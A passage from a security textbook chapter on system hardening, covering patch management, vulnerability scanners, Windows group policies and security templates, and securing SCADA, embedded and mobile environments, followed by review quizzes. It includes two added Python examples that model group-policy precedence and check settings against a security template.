Patch management is a disciplined approach to the acquisition, testing, and implementation of OS and application patches and requires a fair amount of resources to implement properly. To implement patch management effectively, you must first have a good inventory of the software used in your environment, including all OSs and applications. Then you must set up a process to monitor for updates to those software packages. Many vendors provide the ability to update their products automatically or to automatically check for updates and inform the user when updates are available.
Keeping track of patch availability is merely the first step; in many environments, patches must be analyzed and tested. Does the patch apply to the software you are running? Does the patch address a vulnerability or critical issue that must be addressed immediately? What is the impact of applying that patch or group of patches? Will it break something else if you apply this patch? To address these issues, it is recommended that you use development or test platforms, where you can carefully analyze and test patches before placing them into a production environment. While patches are generally "good," they are not always exhaustively tested; some have been known to "break" other products or functions within the product being patched; and some have introduced new vulnerabilities while attempting to address an existing vulnerability. The extent of analysis and testing varies widely from organization to organization. Testing and analysis will also vary depending on the application or OS and the extent of the patch.
Tech Tip
Patch-Management Solutions
Keeping track of current patch levels in a system or group of systems can be a daunting job. There are a variety of software solutions to assist administrators in this task. One of these programs is Secunia Personal Software Inspector (PSI), http://secunia.com. This program, which is free for personal use, will track updates for applications installed on a machine.
• Secunia Personal Software Inspector results screen
Once a patch has been analyzed and tested, administrators have to determine when to apply the patch. As many patches require a restart of applications or services or even a reboot of the entire system, most operational environments apply patches only at specific times, to reduce downtime and possible impact and to ensure administrators are available if something goes wrong. Many organizations will also have a rollback plan that allows them to recover the systems back to a known good configuration prior to the patch, in case the patch has unexpected or undesirable effects. Some organizations require extensive coordination and approval of patches prior to implementation, and some institute "lockout" dates where no patching or system changes (with few exceptions) can be made, to ensure business operations are not disrupted. For example, an e-commerce site might have a lockout between the Thanksgiving and Christmas holidays to ensure the site is always available to holiday shoppers.
Tech Tip
Production Patching
Patching of production systems brings risk in the change process. This risk should be mitigated via a change management process. Change management is covered in detail in Chapter 21. Patching of production systems should follow the enterprise change management process.
With any environment, but especially with larger environments, it can be a challenge to track the update status of every desktop and server in the organization. Documenting and maintaining patch status can be a challenge. However, with a disciplined approach, training, policies, and procedures, even the largest environments can be managed. To assist in their patch-management efforts, many organizations use a patch-management product that automates many of the mundane and manpower-intensive tasks associated with patch management. For example, many patch-management products provide the following:
Ability to inventory applications and operating systems in use
Notification of patches that apply to your environment
Periodic or continual scanning of systems to validate patch status and identify missing patches
Ability to select which patches to apply and to which systems to apply them
Ability to push patches to systems on an on-demand or scheduled basis
Ability to report patch success or failure
Ability to report patch status on any or all systems in the environment
Patch-management solutions can also be useful to satisfy audit or compliance requirements, as they can show a structured approach to patch management, show when and how systems are patched, and provide a detailed accounting of patch status within the organization. Microsoft provides a free patch-management product called Windows Server Update Services (WSUS), shown in Figure 14.18. Using the WSUS product, administrators can manage updates for any compatible Windows-based system in their organization. The WSUS product can be configured to download patches automatically from Microsoft based on a variety of factors (such as OS, product family, criticality, and so on). When updates are downloaded, the administrator can determine whether or not to push out the patches and when to apply them to the systems in their environment. The WSUS product can also help administrators track patch status on their systems, which is a useful and necessary feature.
• Figure 14.18 Windows Server Update Services
Host Software Baselining
To secure, configure, and patch software, administrators must first know what software is installed and running on systems. Maintaining an accurate picture of what operating systems and applications are running inside an organization can be a very labor-intensive task for administrators—especially if individual users have the ability to load software onto their own servers and workstations. To address this issue, many organizations develop software baselines for hosts and servers. Sometimes called "default," "gold," or "standard" configurations, a software baseline contains all the approved software that should appear on a desktop or server within the organization. While software baselines can differ slightly due to disparate needs between groups of users, the more "standard" a software baseline becomes, the easier it will be for administrators to secure, patch, and maintain systems within the organization.
Vulnerability Scanner
A vulnerability scanner is a program designed to probe hosts for weaknesses, misconfigurations, old versions of software, and so on. There are essentially three main categories of vulnerability scanners: network, host, and application. A network vulnerability scanner probes a host or hosts for issues across their network connections. Typically a network scanner will either contain or use a port scanner to perform an initial assessment of the network to determine which hosts are alive and which services are open on those hosts. Each system and service is then probed. Network scanners are very broad tools that can run potentially thousands of checks, depending on the OS and services being examined. This makes them a very good "broad sweep" for network-visible vulnerabilities.
Due to the number of checks they can perform, network scanners can generate a great deal of traffic and a large number of connections to the systems being examined, so care should be taken to minimize the impact on production systems and production networks.
Network scanners are essentially the equivalent of a Swiss army knife for assessments. They do lots of tasks and are extremely useful to have around—they may not be as good as a tool dedicated to examining one specific type of service, but if you can only run a single tool to examine your network for vulnerabilities, you'll want that tool to be a network vulnerability scanner. Figure 14.19 shows a screenshot of Nessus from Tenable Network Security, a very popular network vulnerability scanner.
• Figure 14.19 Nessus—a network vulnerability scanner
Bottom line: If you need to perform a broad sweep for vulnerabilities on one or more hosts across the network, a network vulnerability scanner is the right tool for the job.
Host vulnerability scanners are designed to run on a specific host and look for vulnerabilities and misconfigurations on that host. Host scanners tend to be more specialized because they're looking for issues associated with a specific operating system or set of operating systems. A good example of a host scanner is the Microsoft Baseline Security Analyzer (MBSA), shown in Figure 14.20. MBSA is designed to examine the security state of a Windows host and offer guidance to address any vulnerabilities, misconfigurations, or missing patches. Although MBSA can be run against remote systems across the network, it is typically run on the host being examined and requires you to have access to that local host (at the Administrator level). The primary thing to remember about host scanners is that they are typically looking for vulnerabilities on the system they are running on.
• Figure 14.20 Microsoft Baseline Security Analyzer
Exam Tip: If you want to scan a specific host for vulnerabilities, weak password policies, or unchanged passwords, and you have direct access to the host, a host vulnerability scanner might be just the tool to use.
Selecting the right type of vulnerability scanner isn't that difficult. Just focus on what types of vulnerabilities you need to scan for and how you will be accessing the host/services/applications being scanned. It's also worth noting that to do a thorough job, you will likely need both network-based and host-based scanners—particularly for critical assets. Host- and network-based scanners perform different tests and provide visibility into different types of vulnerabilities. If you want to ensure the best coverage, you'll need to run both.
Application vulnerability scanners are designed to look for vulnerabilities in applications or certain types of applications. Application scanners are some of the most specialized scanners—even though they contain hundreds or even thousands of checks, they only look for misconfigurations or vulnerabilities in a specific type of application. Arguably the most popular type of application scanners are designed to test for weaknesses and vulnerabilities in web-based applications. Web applications are designed to be visible, interact with users, and accept and process user input—all things that make them attractive targets for attackers. More details on application vulnerability scanners can be found in Chapter 18.
Exam Tip: If you want to examine a specific application or multiple instances of the same type of application (such as a web site), an application scanner is the tool of choice.
Group Policies
Microsoft defines a group policy as "an infrastructure used to deliver and apply one or more desired configurations or policy settings to a set of targeted users and computers within an Active Directory environment. This infrastructure consists of a Group Policy engine and multiple client-side extensions (CSEs) responsible for writing specific policy settings on target client computers." Introduced with the Windows 2000 operating system, group policies are a great way to manage and configure systems centrally in an Active Directory environment (Windows NT had policies—but technically not "group policies"). Group policies can also be used to manage users, making these policies valuable tools in any large environment. Within the Windows environment, group policies can be used to refine, set, or modify a system's Registry settings, auditing and security policies, user environments, logon/logoff scripts, and so on. Policy settings are stored in a group policy object (GPO) and are referenced internally by the OS using a globally unique identifier (GUID). A single policy can be linked to a single user, a group of users, a group of machines, or an entire organizational unit (OU), which makes updating common settings on large groups of users or systems much easier. Users and systems can have more than one GPO assigned and active, which can create conflicts between policies that must then be resolved at an attribute level. Group policies can also overwrite local policy settings. Group policies should not be confused with local policies. Local policies are created and applied to a specific system (locally), are not user specific (you can't have local policy X for user A and local policy Y for user B), and are overwritten by GPOs. Further confusing some administrators and users, policies can be applied at the local, site, domain, and OU level. Policies are applied in hierarchical order—local, then site, then domain, and so on. This means settings in a local policy can be overridden or reversed by settings in the domain policy if there is a conflict between the two policies. If there is no conflict, the policy settings are aggregated.
Try This!
Windows Local Security Policies
Open a command prompt as either administrator or a user with administrator privileges on a Windows system. Type the command secpol and press ENTER (this should bring up the Local Security Policy utility). Expand Account Policies on the left side of the Local Security Policy window (which should have a + next to it). Click Password Policy. Look in the right side of the Local Security Policy window. What is the minimum password length? What is the maximum password age in days? Now explore some of the policy settings—but be careful! Changes made to the local security policy can affect the functionality or usability of your system.
Creating GPOs is usually done through either the Group Policy Object Editor, shown in Figure 14.21, or the Group Policy Management Console (GPMC). The GPMC is a more powerful GUI-based tool that can summarize GPO settings; simplify security filtering settings; back up, clone, restore, and edit GPOs; and perform other tasks. After creating a GPO, administrators will associate it with the desired targets. After association, group policies operate on a pull model. At a semi-random interval, the Group Policy client will collect and apply any policies associated to the system and the currently logged-on user.
•Figure14.21GroupPolicyObjectEditor
Microsoft group policies can provide many useful options including:
Network location awareness Systems are now "aware" of which network they are connected to and can apply different GPOs as needed. For example, a system can have a very restrictive GPO when connected to a public network and a less restrictive GPO when connected to an internal, trusted network.
Ability to process without ICMP Older group policy processes would occasionally time out or fail completely if the targeted system did not respond to ICMP packets. Implementations in Windows Vista and later do not rely on ICMP during the GPO update process.
VPN compatibility As a side benefit of network location awareness, mobile users who connect through VPNs can receive a GPO update in the background after connecting to the corporate network via VPN.
Power management Starting with Windows Vista, power management settings can be configured using GPOs.
Device access blocking Under Windows Vista and later, policy settings have been added that allow administrators to restrict user access to USB drives, CD-RW drives, DVD-RW drives, and other removable media.
Location-based printing Users can be assigned to various printers based on their location. As mobile users move, their printer locations can be updated to the closest local printer.
In Windows, policies are applied in hierarchical order. Local policies get applied first, then site policies, then domain policies, and finally OU policies. If a setting from a later policy conflicts with a setting from an earlier policy, the setting from the later policy "wins" and is applied. Keep this in mind when building group policies.
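The precedence rules above as a small model, added here as an example; it is not code from the book or from any Microsoft tool. Each policy is a dict of settings, a setting a policy leaves out (or sets to None) is "not configured" and inherits, and the policies are applied local, then site, then domain, then OU. The policy names and setting values are constructed for illustration.

```python
"""Model of Windows Group Policy precedence: local, site, domain, OU.

Added example, not from the book. Policies are plain dicts; a setting
absent from a policy (or set to None) is "not configured" and leaves the
inherited value alone. A later level wins a conflict; non-conflicting
settings from every level are aggregated.
"""

LEVEL_ORDER = ("local", "site", "domain", "ou")


def resolve_policies(linked):
    """linked: list of (level, name, settings) tuples in any order.

    Returns (effective, winners): the effective value of each setting and,
    for each setting, the policy that supplied it. Sorting by level is
    stable, so link order within a level (parent OU before child OU) is kept.
    """
    rank = {level: i for i, level in enumerate(LEVEL_ORDER)}
    ordered = sorted(linked, key=lambda policy: rank[policy[0]])
    effective, winners = {}, {}
    for level, name, settings in ordered:
        for key, value in settings.items():
            if value is None:          # "not configured": inherit, do not override
                continue
            effective[key] = value     # later level overrides earlier level
            winners[key] = f"{level}:{name}"
    return effective, winners


# Constructed policies for illustration (names and values are made up).
LOCAL = ("local", "Local Security Policy", {
    "MinimumPasswordLength": 6,
    "MaximumPasswordAge": 90,
    "AuditLogonEvents": "Failure",
})
SITE = ("site", "HQ-Site-GPO", {
    "AuditLogonEvents": "Success,Failure",
})
DOMAIN = ("domain", "Default Domain Policy", {
    "MinimumPasswordLength": 12,
    "LockoutThreshold": 5,
    "PasswordComplexity": None,        # explicitly not configured
})
OU = ("ou", "Servers-OU-GPO", {
    "MaximumPasswordAge": 60,
})


def demo():
    # Link order is deliberately shuffled; the level ranking decides precedence.
    return resolve_policies([DOMAIN, OU, LOCAL, SITE])


if __name__ == "__main__":
    effective, winners = demo()
    for key in sorted(effective):
        print(f"{key:24} = {str(effective[key]):18} (from {winners[key]})")
```

Running it shows MinimumPasswordLength coming from the domain policy (12, overriding the local 6), MaximumPasswordAge from the OU policy (60, overriding the local 90), LockoutThreshold aggregated from the domain policy with no conflict, and PasswordComplexity absent because no level configured it. The real client adds enforced and blocked-inheritance links and security filtering on top of this ordering; the model shows only the LSDOU rule the text states.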
Security Templates
A security template is simply a collection of security settings that can be applied to a system. Within the Windows OSs, security templates can contain hundreds of settings that control or modify system settings such as password length, auditing of user actions, or restrictions on network access. Security templates can be standalone files that are applied manually to each system, but they can also be part of a group policy, allowing common security settings to be applied to systems on a much wider scale.
Exam Tip: A security template is a collection of security settings that can be applied to a system. Microsoft security template files have an .inf extension and are usually stored in C:\WINDOWS\security\templates.
As an administrator, when you are creating a security template, all settings are initially "not configured," which means the template will make no changes to whatever settings are already in place. By selecting the settings you want to modify, you can fine-tune the template to create a more (or less) secure system. Security templates typically configure settings in the following areas:
Account policies Settings for user accounts, such as password length, complexity requirements, account lockouts, and so on.
Event log settings Settings that apply to the three main audit logs within Windows (Application, System, and Security), such as log file size, retention of older entries, and so on.
File permissions Settings that apply to files and folders, such as permission inheritance, locking permissions, and so on.
Registry permissions Settings that control who can access the Registry and how it can be accessed.
Restricted groups Settings that enforce the membership of sensitive groups such as Administrators. When the policy is applied, the accounts listed in the policy are placed in the group and any member not listed is removed, so a user added to the local group by hand is taken out again at the next policy refresh.
System services Settings for services that run on the system, such as startup mode, whether or not users can stop/start the service, and so on.
User rights Settings that control what a user can and cannot do on the system.
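The "not configured" rule and the section layout of an .inf template, turned into a compliance check. This is an added example, not the book's code and not a Microsoft tool; the template text and the host's "current" settings below are constructed. On a real system the template would be read from the templates directory, the live values would be queried from the OS, and the comparison is normally done for you by secedit /analyze.

```python
"""Check a host's settings against a Windows security template (.inf).

Added example, not from the book. The template text and the CURRENT
snapshot are constructed; a real check would read the .inf from
%SystemRoot%\\security\\templates and query the live system (or simply
run secedit /analyze). A key the template does not mention is
"not configured" and is never reported.
"""
import configparser

TEMPLATE_INF = """\
[Version]
signature="$CHICAGO$"
Revision=1
[System Access]
MinimumPasswordLength = 12
PasswordComplexity = 1
MaximumPasswordAge = 60
LockoutBadCount = 5
[Event Audit]
AuditLogonEvents = 3
AuditAccountLogon = 3
[Registry Values]
MACHINE\\System\\CurrentControlSet\\Control\\Lsa\\LimitBlankPasswordUse=4,1
"""

# Constructed snapshot of a host's current settings, same section/key naming.
CURRENT = {
    "System Access": {
        "MinimumPasswordLength": "8",
        "PasswordComplexity": "0",
        "MaximumPasswordAge": "60",
        "LockoutBadCount": "0",
    },
    "Event Audit": {
        "AuditLogonEvents": "3",
        "AuditAccountLogon": "0",
    },
    "Registry Values": {
        "MACHINE\\System\\CurrentControlSet\\Control\\Lsa\\LimitBlankPasswordUse": "4,1",
    },
}


def parse_template(text):
    """Return {section: {key: value}} for every setting the template configures."""
    parser = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    parser.optionxform = str      # keep key case; registry paths are easier to read as written
    parser.read_string(text)
    return {s: dict(parser[s]) for s in parser.sections() if s != "Version"}


def find_deviations(template, current):
    """List (section, key, expected, actual) where the host differs from the template."""
    deviations = []
    for section, settings in template.items():
        for key, expected in settings.items():
            actual = current.get(section, {}).get(key)
            if actual != expected:
                deviations.append((section, key, expected, actual))
    return deviations


def check():
    return find_deviations(parse_template(TEMPLATE_INF), CURRENT)


if __name__ == "__main__":
    for section, key, expected, actual in check():
        print(f"[{section}] {key}: expected {expected}, found {actual}")
```

The check reports four deviations on the constructed data (password length, complexity, lockout count, account logon auditing) and stays silent about MaximumPasswordAge and the Registry value, which already match. Keys the template never mentions are not even compared, which is exactly what "not configured" means when a template is applied.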
Tech Tip
A Good Administrator's Work Is Never Done
Once a system or network device is baselined, an administrator's work is far from over. Continuous security monitoring is the never-ending process of collecting data points and metrics, analyzing them, and using the collected data to adjust security postures as needed. When the security monitoring uncovers an issue or vulnerability, the process of remediation begins. Remediation is the process of addressing a security flaw, vulnerability, or similar issue. You might say that a good administrator's work is never done.
You can create and/or modify security templates on your local system through the Microsoft Management Console (if you have the Security Templates snap-in installed). Microsoft includes a series of predefined security templates (usually stored in \WINDOWS\security\templates) that will appear under Security Templates in your MMC window. These templates range from minimal to maximal security and can all be applied as-is or modified as needed. You can also create a completely new security template and then customize each of the settings to your specifications. Figure 14.22 shows the MMC with the Security Templates snap-in enabled.
• Figure 14.22 MMC with Security Templates snap-in
Alternative Environments
Alternative environments are those that are not traditional computer systems in a common IT environment. This is not to say that these environments are rare; in fact, there are millions of systems, composed of hundreds of millions of devices, all across society. Computers exist in many systems where they perform critical functions specifically tied to a particular system. These alternative systems are frequently static in nature; that is, their software is unchanging over the course of its function. Updates and revisions are few and far between. While this may seem to be counter to current security practices, it isn't: because these alternative systems are constrained to a limited, defined set of functionality, the risk from vulnerabilities is limited. Examples of these alternative environments include embedded systems, SCADA systems, mobile devices, mainframes, game consoles, and in-vehicle computers.
SCADA
SCADA is an acronym for supervisory control and data acquisition, a system designed to control automated systems in cyber-physical environments. SCADA systems control manufacturing plants, traffic lights, refineries, energy networks, water plants, building automation and environmental controls, and a host of other systems. SCADA is closely related to distributed control systems (DCS); both are kinds of industrial control systems (ICS), and the terms are often used interchangeably, with the variations depending on the industry and the configuration. Where computers control a physical process directly, a SCADA system likely is involved. Most SCADA systems involve multiple components networked together to achieve a set of functional objectives. These systems frequently include a human machine interface (HMI), where an operator can exert a form of directive control over the operation of the system under control.

SCADA systems historically have been isolated from other systems, but the isolation is decreasing as these systems are being connected across traditional networks to improve business functionality. Many older SCADA systems were air gapped from the corporate network; that is, they shared no direct network connections. This meant that data flows in and out were handled manually and took time to accomplish. Modern systems wished to remove this constraint and added direct network connections between the SCADA networks and the enterprise IT network. These connections increase the attack surface and the risk to the system, and the more they resemble an IT networked system, the greater the need for security functions.

SCADA systems have been drawn into the security spotlight with the Stuxnet attack on Iranian nuclear facilities, initially reported in 2010. Stuxnet is malware designed to attack one specific SCADA system and cause failures resulting in plant equipment damage. This attack was complex and well designed, crippling nuclear fuel processing in Iran for a significant period of time. This attack raised awareness of the risks associated with SCADA systems, whether connected to the Internet or not (Stuxnet crossed an air gap to hit its target, carried across on infected removable media).
Embedded Systems
Embedded system is the name given to a computer that is included as an integral part of a larger system. From computer peripherals like printers, to household devices like smart TVs and thermostats, to the car you drive, embedded systems are everywhere. Embedded systems can be as simple as a microcontroller with fully integrated interfaces (a system on a chip) or as complex as the tens of interconnected embedded systems in a modern automobile. Embedded systems are designed with a single control purpose in mind and have virtually no additional functionality, but this does not mean that they are free of risk or security concerns. The vast majority of security exploits involve getting a device or system to do something it is capable of doing, and technically designed to do, even if the resulting functionality was never an intended use of the device or system. The designers of embedded systems typically are focused on minimizing costs, with security seldom seriously considered as part of either the design or the implementation. Because most embedded systems operate as isolated systems, the risks have not been significant. However, as capabilities have increased, and these devices have become networked together, the risks have increased significantly. For example, smart printers have been hacked as a way into enterprises, and as a way to hide from defenders. And when next-generation automobiles begin to talk to each other, passing traffic and other information between them, and begin to have navigation and other inputs being beamed into systems, the risks will increase and security will become an issue. This has already been seen in the airline industry, where the separation of in-flight Wi-Fi, in-flight entertainment, and cockpit digital flight control networks has become a security issue.
Exam Tip: Understand static environments, systems in which the hardware, OS, applications, and networks are configured for a specific function or purpose. These systems are designed to remain unaltered through their life cycle, rarely requiring updates.
Building-automation systems, climate control systems, HVAC systems, elevator control systems, and alarm systems are just some of the examples of systems that are managed by embedded systems. Although these systems used to be independent and standalone systems, the rise of hyperconnectivity has shown value in integrating them. Having a "smart building" that reduces building resources in accordance with the number and distribution of people inside increases efficiency and reduces costs. Interconnecting these systems and adding in Internet-based central control mechanisms does increase the risk profile from outside attacks.
Phones and Mobile Devices
Mobile devices may seem to be a static environment, one where the OS rarely changes or is rarely updated, but as these devices become more and more ubiquitous in capability, this is not turning out to be the case. Mobile devices have regular software updates to the OS, and users add applications, making most mobile devices a complete security challenge. Mobile devices frequently come with Bluetooth connectivity mechanisms. Protection of the devices from attacks against the Bluetooth connection, such as bluejacking and bluesnarfing, is an important mitigation. To protect against unauthorized connections, a Bluetooth device should always have discoverable mode turned off unless the user is deliberately pairing the device. There are many different operating systems used in mobile devices, the most common of these by market share being Android and iOS from Apple. Android is by far the largest footprint, followed distantly by Apple's iOS. Microsoft and Blackberry have their own OSs, but neither has major numbers of users.
Android
Android is a generic name associated with the mobile OS that is based on Linux. Google acquired the Android platform, made it open source, and began shipping devices in 2008. Android has undergone several updates since, and most systems have some degree of customization added for specific mobile carriers. Android has had numerous security issues over the years, ranging from vulnerabilities that allow attackers access to the OS, to malware-infected applications. The Android platform continues to evolve as the code is cleaned up and the number of vulnerabilities is reduced. The issue of malware-infected applications is much tougher to resolve, as the ability to create content and add it to the app store (Google Play) is considerably less regulated than in the Apple and Microsoft ecosystems. The use of mobile device management (MDM) systems is advised in enterprise deployments, especially when BYOD occurs. This and other security aspects specific to mobile devices are covered in Chapter 12.
iOS
iOS is the name of Apple's proprietary operating system for its mobile platforms. Because Apple does not license the software for use other than on its own devices, Apple retains full and complete control over the OS and any specific capabilities. Apple has also exerted significant control over its application store, which has dramatically limited the incidence of malware in the Apple ecosystem.
Jailbreaking
A common hack associated with iOS devices is the jailbreak. Jailbreaking is a process by which the user escalates their privilege level, bypassing the operating system's controls and limitations. The user still has the complete functionality of the device, but also has additional capabilities, bypassing the OS-imposed user restrictions. There are several schools of thought concerning the utility of jailbreaking, but the important issue from a security point of view is that running any device with enhanced privileges can result in errors that cause more damage, because normal security controls are typically bypassed.
Mainframe
Mainframes represent the history of computing, and although many people think they have disappeared, they are still very much alive in enterprise computing. Mainframes are high-performance machines that offer large quantities of memory, computing power, and storage. Mainframes have been used for decades for high-volume transaction systems as well as high-performance computing. The security associated with mainframe systems tends to be built into the operating system on specific-purpose mainframes. Mainframe environments tend to have very strong configuration control mechanisms, and very high levels of stability. Mainframes have become a cost-effective solution for many high-volume applications because many instances of virtual machines can run on the mainframe hardware. This opens the door for many new security vulnerabilities, not on the mainframe hardware per se, but rather through vulnerabilities in the guest OS in the virtual environment.
Game Consoles
Computer-based game consoles can be considered a type of embedded system designed for entertainment. The OS in a game console is not there for the user, but rather there to support the specific applications or game. There typically is no user interface to the OS on a game console for a user to interact with; rather, the OS is designed for a sole purpose. With the rise of multifunction entertainment consoles, the attack surface of a gaming console can be fairly large, but it is still constrained by the closed nature of the gaming ecosystem. Updates for the firmware and OS-level software are provided by the console manufacturer. This closed environment offers a reasonable level of risk associated with the security of the systems that are connected. As game consoles become more general in purpose and include features such as web browsing, the risks increase to levels commensurate with any other general computing platform.
In-vehicle Computing Systems
Motor vehicles have had embedded computers in them for years, regulating engine functions, environmental controls, and dashboard displays. Recently the functionality has expanded to onscreen entertainment and navigation systems. As the functionality of the systems is expanding, with the addition of networking capability, the same security risks associated with other networked systems emerge. As the in-vehicle computing systems continue to integrate with mobile electronics, and with the coming vehicle-to-vehicle and vehicle-to-roadway communications, security risks will increase and become a pressing issue.
Alternative Environment Methods
Many of the alternative environments can be considered static systems. Static systems are those that have a defined scope and purpose and do not regularly change in a dynamic manner, unlike most PC environments. Static systems tend to have closed ecosystems, with complete control over all functionality by a single vendor. A wide range of security techniques can be employed in the management of alternative systems. Network segmentation, security layers, wrappers, and firewalls assist in the securing of the network connections between these systems. Manual updates, firmware control, and control redundancy assist in the security of the device operation.
Network Segmentation
Network segmentation is the use of the network architecture to limit communication between devices. A variety of networking mechanisms can be used to limit access to devices at the network level. Logical network segmentation can be done via VLANs, MAC and IP address restrictions at routers and switches, firewall filtering, and access control mechanisms. One of the challenges with alternative systems is that the devices themselves may not have typical security controls such as access controls or encryption included in their function sets. This makes external controls such as network segmentation even more critical as part of a security solution.
Security Layers
The use of different layers to perform different functions has been a staple of computer science for decades. Employing layers to enforce security aspects has also been a long-standing concept. Not all layers have the same information or processing capability, and using each layer to achieve a part of the security solution leads to more robust security solutions. While a network can manage traffic based on networking information, this is not a complete security solution. Adding additional layers, such as application layer firewalls and authentication services, adds additional security functions that further reduce the risk associated with the system.
Application Firewalls
Application firewalls are policy-enforcement mechanisms that operate at the application layer to enforce a set of communication rules. While a network firewall examines network traffic and enforces rules based on addresses, an application firewall adds significantly greater ability to control an application's communications across the network.
Manual Updates
All systems eventually require updates to fix issues, patch vulnerabilities, and even change functionality. In alternative environments, these changes are in many cases done in a manual manner. Manual updates can be used to restrict the access to the system, preventing unauthorized changes to a system. In some cases, because of scale, an automated system may be used to push out the updates, but the principle of tightly controlling access to system update functionality needs to be preserved.
Firmware Version Control
Firmware is present in virtually every system, but in many embedded systems it plays an even more critical role, as it may also contain the OS and application. Maintaining strict control measures over the changing of firmware is essential to ensuring the authenticity of the software on a system. Firmware updates require extreme quality measures to ensure that errors are not introduced as part of an update process. Updating firmware, although only occasionally necessary, is a very sensitive event, for failure can lead to system malfunction. If an unauthorized party is able to change the firmware of a system, as demonstrated in an attack against ATMs, an adversary can gain complete functional control over a system.
Wrappers
Wrappers are structures used to enclose or contain some other system. Wrappers have been used in a variety of ways, including to obscure or hide functionality. A Trojan horse is a form of wrapper. Wrappers also can be used to encapsulate information, such as in tunneling or VPN solutions. Wrappers can act as a form of channel control, including integrity and authentication information that a normal signal cannot carry. It is common to see wrappers used in alternative environments to prepare communications for IP transmission. Do not confuse this general idea with TCP Wrappers, the UNIX host-based access control facility covered earlier in this chapter, which wraps a network service and accepts or refuses each connection according to the rules in /etc/hosts.allow and /etc/hosts.deny.
Control Redundancy and Diversity
Defense in depth is one of the underlying security fundamentals, and this is especially needed in alternative environments. Many alternative environments are not equipped with on-board encryption, access control, or authentication services. This makes the controls that surround the device even more critical in ensuring secure operation. Designing overlapping controls such that each assists the others but does not duplicate them adds significant strength to a security solution. The objective is to raise barriers to entry, preventing unauthorized parties from reaching vulnerabilities, and to mitigate those vulnerabilities they can reach such that the attacker cannot proceed further. There is no such thing as perfect security, but a series of overlapping controls can make exploitation nearly impossible. When the system is in an alternative environment, whether static or not, the principles of security still apply. In fact, in many cases, they are even more critical because the devices themselves have little to no security functionality and thus depend on the supporting environment to be secure. A diversity of controls in redundant, overlapping structures is the best method of providing this level of mitigation.
Exam Tip: Understand static environment security methods. Static systems require security and techniques such as network segmentation, security layers, firewalls, wrappers, and other security controls.
Chapter 14 Review
For More Information
Microsoft's Safety & Security Center www.microsoft.com/security/default.mspx
SANS Reading Room: Application and Database Security www.sans.org/reading_room/whitepapers/application/
Lab Manual Exercises
The following lab exercises from the companion lab manual, Principles of Computer Security Lab Manual, Fourth Edition, provide practical application of material covered in this chapter:
Chapter Summary
After reading this chapter and completing the exercises, you should understand the following about hardening systems and baselines.
Harden operating systems and network operating systems
Security baselines are critical to protecting information systems, particularly those allowing connections from external users.
The process of establishing a system's security state is called baselining, and the resulting product is a security baseline that allows the system to run safely and securely.
Hardening is the process by which operating systems, network resources, and applications are secured against possible attacks.
Securing operating systems consists of removing or disabling unnecessary services, restricting permissions on files and directories, removing unnecessary software (or not installing it in the first place), applying the latest patches, removing unnecessary user accounts, and ensuring strong password guidelines are in place.
Securing network resources consists of disabling unnecessary functions, restricting access to ports and services, ensuring strong passwords are used, and ensuring the code on the network devices is patched and up to date.
Securing applications depends heavily on the application involved but typically consists of removing samples and default materials, preventing reconnaissance attempts, and ensuring the software is patched and up to date.
Implement host-level security
Anti-malware/spyware/virus protections are needed on host machines to prevent malicious code attacks.
Whitelisting can provide strong protections against malware on key systems.
Host-based firewalls can provide specific protections from some attacks.
Harden applications
Patch management is a disciplined approach to the acquisition, testing, and implementation of OS and application patches.
A hotfix is a single package designed to address a specific, typically security-related, problem in an operating system or application.
A patch is a fix or collection of fixes that addresses vulnerabilities or errors in operating systems or applications.
A service pack is a large collection of fixes, corrections, and enhancements for an operating system, application, or group of applications.
Establish group policies
Group policies are a method for managing the settings and configurations of many different users and systems in an Active Directory environment.
Group policies can be used to refine, set, or modify a system's Registry settings, auditing and security policies, user environments, logon/logoff scripts, and so on.
Security templates are collections of security settings that can be applied to a system. Security templates can contain hundreds of settings that control or modify settings on a system, such as password length, auditing of user actions, or restrictions on network access.
Secure alternative environments
Alternative environments include process control (SCADA) networks, embedded systems, mobile devices, mainframes, game consoles, transportation systems, and more.
Alternative environments require security, but are not universally equivalent to IT systems, so the specifics can vary tremendously from system to system.
Key Terms
antispam (430), antivirus (AV) (427), application hardening (444), application vulnerability scanner (449), baseline (409), baselining (409), blacklisting (434), firmware update (442), globally unique identifier (GUID) (450), group policy (450), group policy object (GPO) (450), hardening (408), hardware security module (HSM) (438), heuristic scanning (427), host vulnerability scanner (448), hotfix (423), network operating system (NOS) (410), network segmentation (457), network vulnerability scanner (448), operating system (OS) (409), patch (424), patch management (445), Pluggable Authentication Modules (PAM) (419), pop-up blocker (433), process identifier (PID) (418), reference monitor (410), runlevels (418), security kernel (410), security template (452), service pack (424), shadow file (418), TCP wrappers (419), Trusted Operating System (434), Trusted Platform Module (TPM) (438), whitelisting (434)
Key Terms Quiz
Use terms from the Key Terms list to complete the sentences that follow. Don't use the same term more than once. Not all terms will be used.
1. _______________ is the process of establishing a system's security state.
2. Securing and preparing a system for the production environment is called _____________.
3. A(n) _______________ is a small software update designed to address a specific, often urgent, problem.
4. The basic software on a computer that handles input and output is called the _______________.
5. ____________ is the use of the network architecture to limit communication between devices.
6. A(n) _______________ is a bundled set of software updates, fixes, and additional functions contained in a self-installing package.
7. In most UNIX operating systems, each running program is given a unique number called a(n) _______________.
8. When a user or process supplies more data than was expected, a(n) _______________ may occur.
9. _______________ are used to describe the state of init and what system services are operating in UNIX systems.
10. A(n) _______________ is a collection of security settings that can be applied to a system.
Multiple-Choice Quiz
1. A small software update designed to address an urgent or specific problem is called a:
A. Hotfix
B. Service pack
C. Patch
D. None of the above
2. In a UNIX operating system, which runlevel describes single-user mode?
A. 0
B. 6
C. 4
D. 1
3. TCP wrappers do what?
A. Help secure the system by restricting network connections
B. Help prioritize network traffic for optimal throughput
C. Encrypt outgoing network traffic
D. Strip out excess input to defeat buffer overflow attacks
4. File permissions under UNIX consist of what three types?
A. Modify, read, and execute
B. Read, write, and execute
C. Full control, read-only, and run
D. Write, read, and open
5. The mechanism that allows for centralized management and configuration of computers and remote users in an Active Directory environment is called:
A. Baseline
B. Group policies
C. Simple Network Management Protocol
D. Security templates
6. What feature in Windows Server 2008 controls access to network resources based on a client computer's identity and compliance with corporate governance policy?
A. BitLocker
B. Network Access Protection
C. inetd
D. Process identifiers
7. To stop a particular service or program running on a UNIX operating system, you might use the ______ command.
A. netstat
B. ps
C. kill
D. inetd
8. Updating the software loaded on nonvolatile RAM is called:
A. A buffer overflow
B. A firmware update
C. A hotfix
D. A service pack
9. The shadow file on a UNIX system contains:
A. The password associated with a user account
B. Group policy information
C. File permissions for system files
D. Network services started when the system is booted
